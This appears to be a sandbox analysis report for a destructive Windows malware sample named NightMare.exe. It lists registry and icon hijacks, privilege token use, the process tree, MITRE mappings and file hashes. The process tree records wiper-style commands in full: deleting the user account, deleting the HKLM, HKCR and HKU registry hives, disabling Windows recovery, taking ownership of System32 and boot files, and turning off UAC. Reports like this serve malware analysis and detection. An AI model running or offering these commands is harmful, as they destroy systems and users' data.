NightMare.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\3 NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\4 NightMare.exe -
Modifies registry class 37 IoCs
Processes:
NightMare.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ NightMare.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node NightMare.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ NightMare.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon NightMare.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} NightMare.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ NightMare.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ NightMare.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon NightMare.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 29 IoCs
Processes:
takeown.exetakeown.exeNightMare.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3008 takeown.exe Token: SeTakeOwnershipPrivilege 2476 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 3284 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 4508 takeown.exe Token: SeTakeOwnershipPrivilege 5692 takeown.exe Token: SeTakeOwnershipPrivilege 5836 takeown.exe Token: SeTakeOwnershipPrivilege 3480 takeown.exe Token: SeTakeOwnershipPrivilege 6196 takeown.exe Token: SeTakeOwnershipPrivilege 7184 takeown.exe Token: SeTakeOwnershipPrivilege 4340 takeown.exe Token: SeTakeOwnershipPrivilege 7520 takeown.exe Token: SeDebugPrivilege 4356 taskkill.exe Token: SeDebugPrivilege 4328 taskkill.exe Token: SeDebugPrivilege 5852 taskkill.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 4608 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 8280 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 592 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 4036 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 6432 takeown.exe Token: SeDebugPrivilege 1948 NightMare.exe Token: SeTakeOwnershipPrivilege 1620 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NightMare.execmd.execmd.exenet.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1948 wrote to memory of 1412 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1412 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1412 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1412 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1408 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1408 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1408 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 1408 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3012 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3012 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3012 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3012 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2144 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2144 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2144 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2144 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2300 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2300 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2300 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2300 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3004 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3004 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3004 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 3004 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2552 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2552 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2552 1948 NightMare.exe cmd.exe PID 1948 wrote to memory of 2552 1948 NightMare.exe cmd.exe PID 1412 wrote to memory of 2860 1412 cmd.exe net.exe PID 1412 wrote to memory of 2860 1412 cmd.exe net.exe PID 1412 wrote to memory of 2860 1412 cmd.exe net.exe PID 1412 wrote to memory of 2860 1412 cmd.exe net.exe PID 1408 wrote to memory of 2804 1408 cmd.exe reg.exe PID 1408 wrote to memory of 2804 1408 cmd.exe reg.exe PID 1408 wrote to memory of 2804 1408 cmd.exe reg.exe PID 1408 wrote to memory of 2804 1408 cmd.exe reg.exe PID 2860 wrote to memory of 2580 2860 net.exe net1.exe PID 2860 wrote to memory of 2580 2860 net.exe net1.exe PID 2860 wrote to memory of 2580 2860 net.exe net1.exe PID 2860 wrote to memory of 2580 2860 net.exe net1.exe PID 2300 wrote to memory of 3008 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 3008 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 3008 2300 cmd.exe takeown.exe PID 2300 wrote to memory of 3008 2300 cmd.exe takeown.exe PID 2144 wrote to memory of 1956 2144 cmd.exe reg.exe PID 2144 wrote to memory of 1956 2144 cmd.exe reg.exe PID 2144 wrote to memory of 1956 2144 cmd.exe reg.exe PID 2144 wrote to memory of 1956 2144 cmd.exe reg.exe PID 3012 wrote to memory of 2816 3012 cmd.exe reg.exe PID 3012 wrote to memory of 2816 3012 cmd.exe reg.exe PID 3012 wrote to memory of 2816 3012 cmd.exe reg.exe PID 3012 wrote to memory of 2816 3012 cmd.exe reg.exe PID 2552 wrote to memory of 2476 2552 cmd.exe takeown.exe PID 2552 wrote to memory of 2476 2552 cmd.exe takeown.exe PID 2552 wrote to memory of 2476 2552 cmd.exe takeown.exe PID 2552 wrote to memory of 2476 2552 cmd.exe takeown.exe PID 3004 wrote to memory of 2964 3004 cmd.exe ReAgentc.exe PID 3004 wrote to memory of 2964 3004 cmd.exe ReAgentc.exe PID 3004 wrote to memory of 2964 3004 cmd.exe ReAgentc.exe PID 3004 wrote to memory of 2964 3004 cmd.exe ReAgentc.exe PID 2552 wrote to memory of 2612 2552 cmd.exe icacls.exe PID 2552 wrote to memory of 2612 2552 cmd.exe icacls.exe PID 2552 wrote to memory of 2612 2552 cmd.exe icacls.exe PID 2552 wrote to memory of 2612 2552 cmd.exe icacls.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
NightMare.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" NightMare.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"1⤵
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Modifies File Icons
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\net.exenet user Admin /delete3⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /delete4⤵PID:2580
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SysWOW64\reg.exereg delete HKCR3⤵PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k reg delete HKU && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\reg.exereg delete HKU3⤵PID:2816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\reg.exereg delete HKLM3⤵
- Modifies registry key
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\ReAgentc.exereagentc.exe /disable3⤵PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:6912
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:7256
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause2⤵PID:1604
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\system32\taskmgr.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6196
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause2⤵PID:4676
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\system32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause2⤵PID:5136
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI\BCD3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause2⤵PID:3456
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI\boot.sdi3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause2⤵PID:7720
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\system32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7184
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause2⤵PID:5904
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\servicing\TrustedInstaller.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7520
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause2⤵PID:4140
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\System32\WUDFHost.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5836
-
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:8996
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:4168
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:8280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:6892
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:3916
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:5452
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause2⤵PID:7176
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\Boot\DVD\EFI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
Filesize662B
MD521ad42bd4156f914d3a265823a1c269c
SHA14129bc994a0947b38e3bac2aeabc8e2fbdbd503f
SHA256680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2
SHA5127ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a